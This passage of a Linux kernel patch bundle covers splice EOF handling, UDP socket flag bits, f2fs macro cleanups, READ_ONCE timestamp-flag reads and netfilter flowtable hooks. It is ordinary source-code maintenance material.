+ 		smb2_set_err_rsp(work);
+ 	return rc;
+diff --git a/fs/splice.c b/fs/splice.c
+index 5969b7a1d353a..d0230cf8ec571 100644
+--- a/fs/splice.c
++++ b/fs/splice.c
+@@ -65,8 +65,7 @@ static bool page_cache_pipe_buf_try_steal(struct pipe_inode_info *pipe,
+ 		 */
+ 		folio_wait_writeback(folio);
+ 
+-		if (folio_has_private(folio) &&
+-		    !filemap_release_folio(folio, GFP_KERNEL))
++		if (!filemap_release_folio(folio, GFP_KERNEL))
+ 			goto out_unlock;
+ 
+ 		/*
+@@ -764,6 +763,17 @@ static long do_splice_from(struct pipe_inode_info *pipe, struct file *out,
+ 	return out->f_op->splice_write(pipe, out, ppos, len, flags);
+ }
+ 
++/*
++ * Indicate to the caller that there was a premature EOF when reading from the
++ * source and the caller didn't indicate they would be sending more data after
++ * this.
++ */
++static void do_splice_eof(struct splice_desc *sd)
++{
++	if (sd->splice_eof)
++		sd->splice_eof(sd);
++}
++
+ /*
+  * Attempt to initiate a splice from a file to a pipe.
+  */
+@@ -864,7 +874,7 @@ ssize_t splice_direct_to_actor(struct file *in, struct splice_desc *sd,
+ 
+ 		ret = do_splice_to(in, &pos, pipe, len, flags);
+ 		if (unlikely(ret <= 0))
+-			goto out_release;
++			goto read_failure;
+ 
+ 		read_len = ret;
+ 		sd->total_len = read_len;
+@@ -904,6 +914,15 @@ done:
+ 	file_accessed(in);
+ 	return bytes;
+ 
++read_failure:
++	/*
++	 * If the user did *not* set SPLICE_F_MORE *and* we didn't hit that
++	 * "use all of len" case that cleared SPLICE_F_MORE, *and* we did a
++	 * "->splice_in()" that returned EOF (ie zero) *and* we have sent at
++	 * least 1 byte *then* we will also do the ->splice_eof() call.
++	 */
++	if (ret == 0 && !more && len > 0 && bytes)
++		do_splice_eof(sd);
+ out_release:
+ 	/*
+ 	 * If we did an incomplete transfer we must release
+@@ -932,6 +951,14 @@ static int direct_splice_actor(struct pipe_inode_info *pipe,
+ 			      sd->flags);
+ }
+ 
++static void direct_file_splice_eof(struct splice_desc *sd)
++{
++	struct file *file = sd->u.file;
++
++	if (file->f_op->splice_eof)
++		file->f_op->splice_eof(file);
++}
++
+ /**
+  * do_splice_direct - splices data directly between two files
+  * @in:		file to splice from
+@@ -957,6 +984,7 @@ long do_splice_direct(struct file *in, loff_t *ppos, struct file *out,
+ 		.flags		= flags,
+ 		.pos		= *ppos,
+ 		.u.file		= out,
++		.splice_eof	= direct_file_splice_eof,
+ 		.opos		= opos,
+ 	};
+ 	long ret;
+diff --git a/include/linux/bpf.h b/include/linux/bpf.h
+index 3ce9e39ecdb85..ba22cf4f5fc0e 100644
+--- a/include/linux/bpf.h
++++ b/include/linux/bpf.h
+@@ -702,10 +702,14 @@ bpf_ctx_record_field_size(struct bpf_insn_access_aux *aux, u32 size)
+ 	aux->ctx_field_size = size;
+ }
+ 
++static bool bpf_is_ldimm64(const struct bpf_insn *insn)
++{
++	return insn->code == (BPF_LD | BPF_IMM | BPF_DW);
++}
++
+ static inline bool bpf_pseudo_func(const struct bpf_insn *insn)
+ {
+-	return insn->code == (BPF_LD | BPF_IMM | BPF_DW) &&
+-	       insn->src_reg == BPF_PSEUDO_FUNC;
++	return bpf_is_ldimm64(insn) && insn->src_reg == BPF_PSEUDO_FUNC;
+ }
+ 
+ struct bpf_prog_ops {
+@@ -825,6 +829,11 @@ struct btf_func_model {
+  */
+ #define BPF_TRAMP_F_SHARE_IPMODIFY	BIT(6)
+ 
++/* Indicate that current trampoline is in a tail call context. Then, it has to
++ * cache and restore tail_call_cnt to avoid infinite tail call loop.
++ */
++#define BPF_TRAMP_F_TAIL_CALL_CTX	BIT(7)
++
+ /* Each call __bpf_prog_enter + call bpf_func + call __bpf_prog_exit is ~50
+  * bytes on x86.
+  */
+diff --git a/include/linux/bpf_verifier.h b/include/linux/bpf_verifier.h
+index 1a32baa78ce26..f080ccf27d256 100644
+--- a/include/linux/bpf_verifier.h
++++ b/include/linux/bpf_verifier.h
+@@ -429,6 +429,7 @@ struct bpf_insn_aux_data {
+ 	/* below fields are initialized once */
+ 	unsigned int orig_idx; /* original instruction index */
+ 	bool prune_point;
++	bool jmp_point;
+ };
+ 
+ #define MAX_USED_MAPS 64 /* max number of maps accessed by one eBPF program */
+diff --git a/include/linux/f2fs_fs.h b/include/linux/f2fs_fs.h
+index ee0d75d9a302d..1e0df607e40c4 100644
+--- a/include/linux/f2fs_fs.h
++++ b/include/linux/f2fs_fs.h
+@@ -40,9 +40,8 @@
+ 
+ #define F2FS_ENC_UTF8_12_1	1
+ 
+-#define F2FS_IO_SIZE(sbi)	(1 << F2FS_OPTION(sbi).write_io_size_bits) /* Blocks */
+-#define F2FS_IO_SIZE_KB(sbi)	(1 << (F2FS_OPTION(sbi).write_io_size_bits + 2)) /* KB */
+-#define F2FS_IO_SIZE_BYTES(sbi)	(1 << (F2FS_OPTION(sbi).write_io_size_bits + 12)) /* B */
++#define F2FS_IO_SIZE(sbi)	BIT(F2FS_OPTION(sbi).write_io_size_bits) /* Blocks */
++#define F2FS_IO_SIZE_KB(sbi)	BIT(F2FS_OPTION(sbi).write_io_size_bits + 2) /* KB */
+ #define F2FS_IO_SIZE_BITS(sbi)	(F2FS_OPTION(sbi).write_io_size_bits) /* power of 2 */
+ #define F2FS_IO_SIZE_MASK(sbi)	(F2FS_IO_SIZE(sbi) - 1)
+ #define F2FS_IO_ALIGNED(sbi)	(F2FS_IO_SIZE(sbi) > 1)
+@@ -340,7 +339,7 @@ enum {
+ 	OFFSET_BIT_SHIFT
+ };
+ 
+-#define OFFSET_BIT_MASK		(0x07)	/* (0x01 << OFFSET_BIT_SHIFT) - 1 */
++#define OFFSET_BIT_MASK		GENMASK(OFFSET_BIT_SHIFT - 1, 0)
+ 
+ struct node_footer {
+ 	__le32 nid;		/* node id */
+@@ -545,7 +544,7 @@ typedef __le32	f2fs_hash_t;
+ #define MAX_DIR_HASH_DEPTH	63
+ 
+ /* MAX buckets in one level of dir */
+-#define MAX_DIR_BUCKETS		(1 << ((MAX_DIR_HASH_DEPTH / 2) - 1))
++#define MAX_DIR_BUCKETS		BIT((MAX_DIR_HASH_DEPTH / 2) - 1)
+ 
+ /*
+  * space utilization of regular dentry and inline dentry (w/o extra reservation)
+diff --git a/include/linux/fs.h b/include/linux/fs.h
+index b6af6abc7a77f..4a1911dcf834b 100644
+--- a/include/linux/fs.h
++++ b/include/linux/fs.h
+@@ -2177,6 +2177,7 @@ struct file_operations {
+ 	int (*flock) (struct file *, int, struct file_lock *);
+ 	ssize_t (*splice_write)(struct pipe_inode_info *, struct file *, loff_t *, size_t, unsigned int);
+ 	ssize_t (*splice_read)(struct file *, loff_t *, struct pipe_inode_info *, size_t, unsigned int);
++	void (*splice_eof)(struct file *file);
+ 	int (*setlease)(struct file *, long, struct file_lock **, void **);
+ 	long (*fallocate)(struct file *file, int mode, loff_t offset,
+ 			  loff_t len);
+diff --git a/include/linux/group_cpus.h b/include/linux/group_cpus.h
+new file mode 100644
+index 0000000000000..e42807ec61f6e
+--- /dev/null
++++ b/include/linux/group_cpus.h
+@@ -0,0 +1,14 @@
++/* SPDX-License-Identifier: GPL-2.0-only */
++/*
++ * Copyright (C) 2016 Thomas Gleixner.
++ * Copyright (C) 2016-2017 Christoph Hellwig.
++ */
++
++#ifndef __LINUX_GROUP_CPUS_H
++#define __LINUX_GROUP_CPUS_H
++#include <linux/kernel.h>
++#include <linux/cpu.h>
++
++struct cpumask *group_cpus_evenly(unsigned int numgrps);
++
++#endif
+diff --git a/include/linux/net.h b/include/linux/net.h
+index 18d942bbdf6e0..25baca60f6cba 100644
+--- a/include/linux/net.h
++++ b/include/linux/net.h
+@@ -209,6 +209,7 @@ struct proto_ops {
+ 				      int offset, size_t size, int flags);
+ 	ssize_t 	(*splice_read)(struct socket *sock,  loff_t *ppos,
+ 				       struct pipe_inode_info *pipe, size_t len, unsigned int flags);
++	void		(*splice_eof)(struct socket *sock);
+ 	int		(*set_peek_off)(struct sock *sk, int val);
+ 	int		(*peek_len)(struct socket *sock);
+ 
+diff --git a/include/linux/pagemap.h b/include/linux/pagemap.h
+index 03307b72de6c6..1be5a1fa6a3a8 100644
+--- a/include/linux/pagemap.h
++++ b/include/linux/pagemap.h
+@@ -199,6 +199,9 @@ enum mapping_flags {
+ 	/* writeback related tags are not used */
+ 	AS_NO_WRITEBACK_TAGS = 5,
+ 	AS_LARGE_FOLIO_SUPPORT = 6,
++	AS_RELEASE_ALWAYS,	/* Call ->release_folio(), even if no private data */
++	AS_STABLE_WRITES,	/* must wait for writeback before modifying
++				   folio contents */
+ };
+ 
+ /**
+@@ -269,6 +272,36 @@ static inline int mapping_use_writeback_tags(struct address_space *mapping)
+ 	return !test_bit(AS_NO_WRITEBACK_TAGS, &mapping->flags);
+ }
+ 
++static inline bool mapping_release_always(const struct address_space *mapping)
++{
++	return test_bit(AS_RELEASE_ALWAYS, &mapping->flags);
++}
++
++static inline void mapping_set_release_always(struct address_space *mapping)
++{
++	set_bit(AS_RELEASE_ALWAYS, &mapping->flags);
++}
++
++static inline void mapping_clear_release_always(struct address_space *mapping)
++{
++	clear_bit(AS_RELEASE_ALWAYS, &mapping->flags);
++}
++
++static inline bool mapping_stable_writes(const struct address_space *mapping)
++{
++	return test_bit(AS_STABLE_WRITES, &mapping->flags);
++}
++
++static inline void mapping_set_stable_writes(struct address_space *mapping)
++{
++	set_bit(AS_STABLE_WRITES, &mapping->flags);
++}
++
++static inline void mapping_clear_stable_writes(struct address_space *mapping)
++{
++	clear_bit(AS_STABLE_WRITES, &mapping->flags);
++}
++
+ static inline gfp_t mapping_gfp_mask(struct address_space * mapping)
+ {
+ 	return mapping->gfp_mask;
+diff --git a/include/linux/skmsg.h b/include/linux/skmsg.h
+index c1637515a8a41..c953b8c0d2f43 100644
+--- a/include/linux/skmsg.h
++++ b/include/linux/skmsg.h
+@@ -106,6 +106,7 @@ struct sk_psock {
+ 	struct mutex			work_mutex;
+ 	struct sk_psock_work_state	work_state;
+ 	struct delayed_work		work;
++	struct sock			*sk_pair;
+ 	struct rcu_work			rwork;
+ };
+ 
+diff --git a/include/linux/socket.h b/include/linux/socket.h
+index 1db29aab8f9c3..b3c58042bd254 100644
+--- a/include/linux/socket.h
++++ b/include/linux/socket.h
+@@ -324,6 +324,7 @@ struct ucred {
+ 					  */
+ 
+ #define MSG_ZEROCOPY	0x4000000	/* Use user data in kernel path */
++#define MSG_SPLICE_PAGES 0x8000000	/* Splice the pages from the iterator in sendmsg() */
+ #define MSG_FASTOPEN	0x20000000	/* Send data in TCP SYN */
+ #define MSG_CMSG_CLOEXEC 0x40000000	/* Set close_on_exec for file
+ 					   descriptor received through
+@@ -334,6 +335,8 @@ struct ucred {
+ #define MSG_CMSG_COMPAT	0		/* We never have 32 bit fixups */
+ #endif
+ 
++/* Flags to be cleared on entry by sendmsg and sendmmsg syscalls */
++#define MSG_INTERNAL_SENDMSG_FLAGS (MSG_SPLICE_PAGES)
+ 
+ /* Setsockoptions(2) level. Thanks to BSD these must match IPPROTO_xxx */
+ #define SOL_IP		0
+diff --git a/include/linux/splice.h b/include/linux/splice.h
+index a55179fd60fc3..41a70687be853 100644
+--- a/include/linux/splice.h
++++ b/include/linux/splice.h
+@@ -38,6 +38,7 @@ struct splice_desc {
+ 		struct file *file;	/* file to read/write */
+ 		void *data;		/* cookie */
+ 	} u;
++	void (*splice_eof)(struct splice_desc *sd); /* Unexpected EOF handler */
+ 	loff_t pos;			/* file position */
+ 	loff_t *opos;			/* sendfile: output position */
+ 	size_t num_spliced;		/* number of bytes already spliced */
+diff --git a/include/linux/udp.h b/include/linux/udp.h
+index e96da4157d04d..efd9ab6df3797 100644
+--- a/include/linux/udp.h
++++ b/include/linux/udp.h
+@@ -30,25 +30,33 @@ static inline u32 udp_hashfn(const struct net *net, u32 num, u32 mask)
+ 	return (num + net_hash_mix(net)) & mask;
+ }
+ 
++enum {
++	UDP_FLAGS_CORK,		/* Cork is required */
++	UDP_FLAGS_NO_CHECK6_TX, /* Send zero UDP6 checksums on TX? */
++	UDP_FLAGS_NO_CHECK6_RX, /* Allow zero UDP6 checksums on RX? */
++	UDP_FLAGS_GRO_ENABLED,	/* Request GRO aggregation */
++	UDP_FLAGS_ACCEPT_FRAGLIST,
++	UDP_FLAGS_ACCEPT_L4,
++	UDP_FLAGS_ENCAP_ENABLED, /* This socket enabled encap */
++};
++
+ struct udp_sock {
+ 	/* inet_sock has to be the first member */
+ 	struct inet_sock inet;
+ #define udp_port_hash		inet.sk.__sk_common.skc_u16hashes[0]
+ #define udp_portaddr_hash	inet.sk.__sk_common.skc_u16hashes[1]
+ #define udp_portaddr_node	inet.sk.__sk_common.skc_portaddr_node
++
++	unsigned long	 udp_flags;
++
+ 	int		 pending;	/* Any pending frames ? */
+-	unsigned int	 corkflag;	/* Cork is required */
+ 	__u8		 encap_type;	/* Is this an Encapsulation socket? */
+-	unsigned char	 no_check6_tx:1,/* Send zero UDP6 checksums on TX? */
+-			 no_check6_rx:1,/* Allow zero UDP6 checksums on RX? */
+-			 encap_enabled:1, /* This socket enabled encap
+-					   * processing; UDP tunnels and
+-					   * different encapsulation layer set
+-					   * this
+-					   */
+-			 gro_enabled:1,	/* Request GRO aggregation */
+-			 accept_udp_l4:1,
+-			 accept_udp_fraglist:1;
++
++/* indicator bits used by pcflag: */
++#define UDPLITE_BIT      0x1  		/* set by udplite proto init function */
++#define UDPLITE_SEND_CC  0x2  		/* set via udplite setsockopt         */
++#define UDPLITE_RECV_CC  0x4		/* set via udplite setsocktopt        */
++	__u8		 pcflag;        /* marks socket as UDP-Lite if > 0    */
+ 	/*
+ 	 * Following member retains the information to create a UDP header
+ 	 * when the socket is uncorked.
+@@ -60,12 +68,6 @@ struct udp_sock {
+ 	 */
+ 	__u16		 pcslen;
+ 	__u16		 pcrlen;
+-/* indicator bits used by pcflag: */
+-#define UDPLITE_BIT      0x1  		/* set by udplite proto init function */
+-#define UDPLITE_SEND_CC  0x2  		/* set via udplite setsockopt         */
+-#define UDPLITE_RECV_CC  0x4		/* set via udplite setsocktopt        */
+-	__u8		 pcflag;        /* marks socket as UDP-Lite if > 0    */
+-	__u8		 unused[3];
+ 	/*
+ 	 * For encapsulation sockets.
+ 	 */
+@@ -89,6 +91,17 @@ struct udp_sock {
+ 	int		forward_deficit;
+ };
+ 
++#define udp_test_bit(nr, sk)			\
++	test_bit(UDP_FLAGS_##nr, &udp_sk(sk)->udp_flags)
++#define udp_set_bit(nr, sk)			\
++	set_bit(UDP_FLAGS_##nr, &udp_sk(sk)->udp_flags)
++#define udp_test_and_set_bit(nr, sk)		\
++	test_and_set_bit(UDP_FLAGS_##nr, &udp_sk(sk)->udp_flags)
++#define udp_clear_bit(nr, sk)			\
++	clear_bit(UDP_FLAGS_##nr, &udp_sk(sk)->udp_flags)
++#define udp_assign_bit(nr, sk, val)		\
++	assign_bit(UDP_FLAGS_##nr, &udp_sk(sk)->udp_flags, val)
++
+ #define UDP_MAX_SEGMENTS	(1 << 6UL)
+ 
+ static inline struct udp_sock *udp_sk(const struct sock *sk)
+@@ -98,22 +111,22 @@ static inline struct udp_sock *udp_sk(const struct sock *sk)
+ 
+ static inline void udp_set_no_check6_tx(struct sock *sk, bool val)
+ {
+-	udp_sk(sk)->no_check6_tx = val;
++	udp_assign_bit(NO_CHECK6_TX, sk, val);
+ }
+ 
+ static inline void udp_set_no_check6_rx(struct sock *sk, bool val)
+ {
+-	udp_sk(sk)->no_check6_rx = val;
++	udp_assign_bit(NO_CHECK6_RX, sk, val);
+ }
+ 
+-static inline bool udp_get_no_check6_tx(struct sock *sk)
++static inline bool udp_get_no_check6_tx(const struct sock *sk)
+ {
+-	return udp_sk(sk)->no_check6_tx;
++	return udp_test_bit(NO_CHECK6_TX, sk);
+ }
+ 
+-static inline bool udp_get_no_check6_rx(struct sock *sk)
++static inline bool udp_get_no_check6_rx(const struct sock *sk)
+ {
+-	return udp_sk(sk)->no_check6_rx;
++	return udp_test_bit(NO_CHECK6_RX, sk);
+ }
+ 
+ static inline void udp_cmsg_recv(struct msghdr *msg, struct sock *sk,
+@@ -132,10 +145,12 @@ static inline bool udp_unexpected_gso(struct sock *sk, struct sk_buff *skb)
+ 	if (!skb_is_gso(skb))
+ 		return false;
+ 
+-	if (skb_shinfo(skb)->gso_type & SKB_GSO_UDP_L4 && !udp_sk(sk)->accept_udp_l4)
++	if (skb_shinfo(skb)->gso_type & SKB_GSO_UDP_L4 &&
++	    !udp_test_bit(ACCEPT_L4, sk))
+ 		return true;
+ 
+-	if (skb_shinfo(skb)->gso_type & SKB_GSO_FRAGLIST && !udp_sk(sk)->accept_udp_fraglist)
++	if (skb_shinfo(skb)->gso_type & SKB_GSO_FRAGLIST &&
++	    !udp_test_bit(ACCEPT_FRAGLIST, sk))
+ 		return true;
+ 
+ 	return false;
+@@ -143,8 +158,8 @@ static inline bool udp_unexpected_gso(struct sock *sk, struct sk_buff *skb)
+ 
+ static inline void udp_allow_gso(struct sock *sk)
+ {
+-	udp_sk(sk)->accept_udp_l4 = 1;
+-	udp_sk(sk)->accept_udp_fraglist = 1;
++	udp_set_bit(ACCEPT_L4, sk);
++	udp_set_bit(ACCEPT_FRAGLIST, sk);
+ }
+ 
+ #define udp_portaddr_for_each_entry(__sk, list) \
+diff --git a/include/net/af_unix.h b/include/net/af_unix.h
+index 480fa579787e5..55ca217c626b7 100644
+--- a/include/net/af_unix.h
++++ b/include/net/af_unix.h
+@@ -77,6 +77,7 @@ static inline struct unix_sock *unix_sk(const struct sock *sk)
+ {
+ 	return (struct unix_sock *)sk;
+ }
++#define unix_peer(sk) (unix_sk(sk)->peer)
+ 
+ #define peer_wait peer_wq.wait
+ 
+diff --git a/include/net/inet_common.h b/include/net/inet_common.h
+index cec453c18f1d6..4673bbfd2811f 100644
+--- a/include/net/inet_common.h
++++ b/include/net/inet_common.h
+@@ -33,6 +33,7 @@ int inet_accept(struct socket *sock, struct socket *newsock, int flags,
+ 		bool kern);
+ int inet_send_prepare(struct sock *sk);
+ int inet_sendmsg(struct socket *sock, struct msghdr *msg, size_t size);
++void inet_splice_eof(struct socket *sock);
+ ssize_t inet_sendpage(struct socket *sock, struct page *page, int offset,
+ 		      size_t size, int flags);
+ int inet_recvmsg(struct socket *sock, struct msghdr *msg, size_t size,
+diff --git a/include/net/ip.h b/include/net/ip.h
+index c286344628dba..c83c09c65623f 100644
+--- a/include/net/ip.h
++++ b/include/net/ip.h
+@@ -95,7 +95,7 @@ static inline void ipcm_init_sk(struct ipcm_cookie *ipcm,
+ 	ipcm_init(ipcm);
+ 
+ 	ipcm->sockc.mark = READ_ONCE(inet->sk.sk_mark);
+-	ipcm->sockc.tsflags = inet->sk.sk_tsflags;
++	ipcm->sockc.tsflags = READ_ONCE(inet->sk.sk_tsflags);
+ 	ipcm->oif = READ_ONCE(inet->sk.sk_bound_dev_if);
+ 	ipcm->addr = inet->inet_saddr;
+ 	ipcm->protocol = inet->inet_num;
+diff --git a/include/net/netfilter/nf_conntrack_act_ct.h b/include/net/netfilter/nf_conntrack_act_ct.h
+index 078d3c52c03f9..e5f2f0b73a9a0 100644
+--- a/include/net/netfilter/nf_conntrack_act_ct.h
++++ b/include/net/netfilter/nf_conntrack_act_ct.h
+@@ -20,7 +20,22 @@ static inline struct nf_conn_act_ct_ext *nf_conn_act_ct_ext_find(const struct nf
+ #endif
+ }
+ 
+-static inline struct nf_conn_act_ct_ext *nf_conn_act_ct_ext_add(struct nf_conn *ct)
++static inline void nf_conn_act_ct_ext_fill(struct sk_buff *skb, struct nf_conn *ct,
++					   enum ip_conntrack_info ctinfo)
++{
++#if IS_ENABLED(CONFIG_NET_ACT_CT)
++	struct nf_conn_act_ct_ext *act_ct_ext;
++
++	act_ct_ext = nf_conn_act_ct_ext_find(ct);
++	if (dev_net(skb->dev) == &init_net && act_ct_ext)
++		act_ct_ext->ifindex[CTINFO2DIR(ctinfo)] = skb->dev->ifindex;
++#endif
++}
++
++static inline struct
++nf_conn_act_ct_ext *nf_conn_act_ct_ext_add(struct sk_buff *skb,
++					   struct nf_conn *ct,
++					   enum ip_conntrack_info ctinfo)
+ {
+ #if IS_ENABLED(CONFIG_NET_ACT_CT)
+ 	struct nf_conn_act_ct_ext *act_ct = nf_ct_ext_find(ct, NF_CT_EXT_ACT_CT);
+@@ -29,22 +44,11 @@ static inline struct nf_conn_act_ct_ext *nf_conn_act_ct_ext_add(struct nf_conn *
+ 		return act_ct;
+ 
+ 	act_ct = nf_ct_ext_add(ct, NF_CT_EXT_ACT_CT, GFP_ATOMIC);
++	nf_conn_act_ct_ext_fill(skb, ct, ctinfo);
+ 	return act_ct;
+ #else
+ 	return NULL;
+ #endif
+ }
+ 
+-static inline void nf_conn_act_ct_ext_fill(struct sk_buff *skb, struct nf_conn *ct,
+-					   enum ip_conntrack_info ctinfo)
+-{
+-#if IS_ENABLED(CONFIG_NET_ACT_CT)
+-	struct nf_conn_act_ct_ext *act_ct_ext;
+-
+-	act_ct_ext = nf_conn_act_ct_ext_find(ct);
+-	if (dev_net(skb->dev) == &init_net && act_ct_ext)
+-		act_ct_ext->ifindex[CTINFO2DIR(ctinfo)] = skb->dev->ifindex;
+-#endif
+-}
+-
+ #endif /* _NF_CONNTRACK_ACT_CT_H */
+diff --git a/include/net/netfilter/nf_flow_table.h b/include/net/netfilter/nf_flow_table.h
+index cd982f4a0f50c..dde4dd9c4012c 100644
+--- a/include/net/netfilter/nf_flow_table.h
++++ b/include/net/netfilter/nf_flow_table.h
+@@ -53,14 +53,17 @@ struct nf_flowtable_type {
+ 	struct list_head		list;
+ 	int				family;
+ 	int				(*init)(struct nf_flowtable *ft);
++	bool				(*gc)(const struct flow_offload *flow);
+ 	int				(*setup)(struct nf_flowtable *ft,
+ 						 struct net_device *dev,
+ 						 enum flow_block_command cmd);
+ 	int				(*action)(struct net *net,
+-						  const struct flow_offload *flow,
++						  struct flow_offload *flow,
+ 						  enum flow_offload_tuple_dir dir,
+ 						  struct nf_flow_rule *flow_rule);
+ 	void				(*free)(struct nf_flowtable *ft);
++	void				(*get)(struct nf_flowtable *ft);
++	void				(*put)(struct nf_flowtable *ft);
+ 	nf_hookfn			*hook;
+ 	struct module			*owner;
+ };
+@@ -164,6 +167,8 @@ enum nf_flow_flags {
+ 	NF_FLOW_HW_DYING,
+ 	NF_FLOW_HW_DEAD,
+ 	NF_FLOW_HW_PENDING,
++	NF_FLOW_HW_BIDIRECTIONAL,
++	NF_FLOW_HW_ESTABLISHED,
+ };
+ 
+ enum flow_offload_type {
+@@ -237,6 +242,11 @@ nf_flow_table_offload_add_cb(struct nf_flowtable *flow_table,
+ 	}
+ 
+ 	list_add_tail(&block_cb->list, &block->cb_list);
++	up_write(&flow_table->flow_block_lock);
++
++	if (flow_table->type->get)
++		flow_table->type->get(flow_table);
++	return 0;
+ 
+ unlock:
+ 	up_write(&flow_table->flow_block_lock);
+@@ -259,6 +269,9 @@ nf_flow_table_offload_del_cb(struct nf_flowtable *flow_table,
+ 		WARN_ON(true);
+ 	}
+ 	up_write(&flow_table->flow_block_lock);
++
++	if (flow_table->type->put)
++		flow_table->type->put(flow_table);
+ }
+ 
+ int flow_offload_route_init(struct flow_offload *flow,
+@@ -266,7 +279,7 @@ int flow_offload_route_init(struct flow_offload *flow,
+ 
+ int flow_offload_add(struct nf_flowtable *flow_table, struct flow_offload *flow);
+ void flow_offload_refresh(struct nf_flowtable *flow_table,
+-			  struct flow_offload *flow);
++			  struct flow_offload *flow, bool force);
+ 
+ struct flow_offload_tuple_rhash *flow_offload_lookup(struct nf_flowtable *flow_table,
+ 						     struct flow_offload_tuple *tuple);
+@@ -312,10 +325,10 @@ void nf_flow_table_offload_flush_cleanup(struct nf_flowtable *flowtable);
+ int nf_flow_table_offload_setup(struct nf_flowtable *flowtable,
+ 				struct net_device *dev,
+ 				enum flow_block_command cmd);
+-int nf_flow_rule_route_ipv4(struct net *net, const struct flow_offload *flow,
++int nf_flow_rule_route_ipv4(struct net *net, struct flow_offload *flow,
+ 			    enum flow_offload_tuple_dir dir,
+ 			    struct nf_flow_rule *flow_rule);
+-int nf_flow_rule_route_ipv6(struct net *net, const struct flow_offload *flow,
++int nf_flow_rule_route_ipv6(struct net *net, struct flow_offload *flow,
+ 			    enum flow_offload_tuple_dir dir,
+ 			    struct nf_flow_rule *flow_rule);
+ 
+diff --git a/include/net/netfilter/nf_tables_ipv4.h b/include/net/netfilter/nf_tables_ipv4.h
+index c4a6147b0ef8c..5225d2bd1a6e9 100644
+--- a/include/net/netfilter/nf_tables_ipv4.h
++++ b/include/net/netfilter/nf_tables_ipv4.h
+@@ -29,8 +29,8 @@ static inline int __nft_set_pktinfo_ipv4_validate(struct nft_pktinfo *pkt)
+ 	if (iph->ihl < 5 || iph->version != 4)
+ 		return -1;
+ 
+-	len = ntohs(iph->tot_len);
+-	thoff = iph->ihl * 4;
++	len = iph_totlen(pkt->skb, iph);
++	thoff = skb_network_offset(pkt->skb) + (iph->ihl * 4);
+ 	if (pkt->skb->len < len)
+ 		return -1;
+ 	else if (len < thoff)
+@@ -62,7 +62,7 @@ static inline int nft_set_pktinfo_ipv4_ingress(struct nft_pktinfo *pkt)
+ 	if (iph->ihl < 5 || iph->version != 4)
+ 		goto inhdr_error;
+ 
+-	len = ntohs(iph->tot_len);
++	len = iph_totlen(pkt->skb, iph);
+ 	thoff = iph->ihl * 4;
+ 	if (pkt->skb->len < len) {
+ 		__IP_INC_STATS(nft_net(pkt), IPSTATS_MIB_INTRUNCATEDPKTS);
+diff --git a/include/net/sock.h b/include/net/sock.h
+index b6027b01c2455..6b51e85ae69e3 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -1279,6 +1279,7 @@ struct proto {
+ 					   size_t len, int flags, int *addr_len);
+ 	int			(*sendpage)(struct sock *sk, struct page *page,
+ 					int offset, size_t size, int flags);
++	void			(*splice_eof)(struct socket *sock);
+ 	int			(*bind)(struct sock *sk,
+ 					struct sockaddr *addr, int addr_len);
+ 	int			(*bind_add)(struct sock *sk,
+@@ -1928,7 +1929,9 @@ struct sockcm_cookie {
+ static inline void sockcm_init(struct sockcm_cookie *sockc,
+ 			       const struct sock *sk)
+ {
+-	*sockc = (struct sockcm_cookie) { .tsflags = sk->sk_tsflags };
++	*sockc = (struct sockcm_cookie) {
++		.tsflags = READ_ONCE(sk->sk_tsflags)
++	};
+ }
+ 
+ int __sock_cmsg_send(struct sock *sk, struct msghdr *msg, struct cmsghdr *cmsg,
+@@ -2741,9 +2744,9 @@ void __sock_recv_wifi_status(struct msghdr *msg, struct sock *sk,
+ static inline void
+ sock_recv_timestamp(struct msghdr *msg, struct sock *sk, struct sk_buff *skb)
+ {
+-	ktime_t kt = skb->tstamp;
+ 	struct skb_shared_hwtstamps *hwtstamps = skb_hwtstamps(skb);
+-
++	u32 tsflags = READ_ONCE(sk->sk_tsflags);
++	ktime_t kt = skb->tstamp;
+ 	/*
+ 	 * generate control messages if
+ 	 * - receive time stamping in software requested
+@@ -2751,10 +2754,10 @@ sock_recv_timestamp(struct msghdr *msg, struct sock *sk, struct sk_buff *skb)
+ 	 * - hardware time stamps available and wanted
+ 	 */
+ 	if (sock_flag(sk, SOCK_RCVTSTAMP) ||
+-	    (sk->sk_tsflags & SOF_TIMESTAMPING_RX_SOFTWARE) ||
+-	    (kt && sk->sk_tsflags & SOF_TIMESTAMPING_SOFTWARE) ||
++	    (tsflags & SOF_TIMESTAMPING_RX_SOFTWARE) ||
++	    (kt && tsflags & SOF_TIMESTAMPING_SOFTWARE) ||
+ 	    (hwtstamps->hwtstamp &&
+-	     (sk->sk_tsflags & SOF_TIMESTAMPING_RAW_HARDWARE)))
++	     (tsflags & SOF_TIMESTAMPING_RAW_HARDWARE)))
+ 		__sock_recv_timestamp(msg, sk, skb);
+ 	else
+ 		sock_write_timestamp(sk, kt);
+@@ -2776,7 +2779,8 @@ static inline void sock_recv_cmsgs(struct msghdr *msg, struct sock *sk,
+ #define TSFLAGS_ANY	  (SOF_TIMESTAMPING_SOFTWARE			| \
+ 			   SOF_TIMESTAMPING_RAW_HARDWARE)
+ 
+-	if (sk->sk_flags & FLAGS_RECV_CMSGS || sk->sk_tsflags & TSFLAGS_ANY)
++	if (sk->sk_flags & FLAGS_RECV_CMSGS ||
++	    READ_ONCE(sk->sk_tsflags) & TSFLAGS_ANY)
+ 		__sock_recv_cmsgs(msg, sk, skb);
+ 	else if (unlikely(sock_flag(sk, SOCK_TIMESTAMP)))
+ 		sock_write_timestamp(sk, skb->tstamp);
+@@ -2825,6 +2829,11 @@ static inline bool sk_is_tcp(const struct sock *sk)
+ 	return sk->sk_type == SOCK_STREAM && sk->sk_protocol == IPPROTO_TCP;
+ }
+ 
++static inline bool sk_is_stream_unix(const struct sock *sk)
++{
++	return sk->sk_family == AF_UNIX && sk->sk_type == SOCK_STREAM;
++}
++
+ /**
+  * sk_eat_skb - Release a skb if it is no longer needed
+  * @sk: socket to eat this skb from
+diff --git a/include/net/tcp.h b/include/net/tcp.h
+index c3d56b337f358..4c838f7290dd9 100644
+--- a/include/net/tcp.h
++++ b/include/net/tcp.h
+@@ -332,6 +332,7 @@ int tcp_sendmsg(struct sock *sk, struct msghdr *msg, size_t size);
+ int tcp_sendmsg_locked(struct sock *sk, struct msghdr *msg, size_t size);
+ int tcp_sendmsg_fastopen(struct sock *sk, struct msghdr *msg, int *copied,
+ 			 size_t size, struct ubuf_info *uarg);
++void tcp_splice_eof(struct socket *sock);
+ int tcp_sendpage(struct sock *sk, struct page *page, int offset, size_t size,
+ 		 int flags);
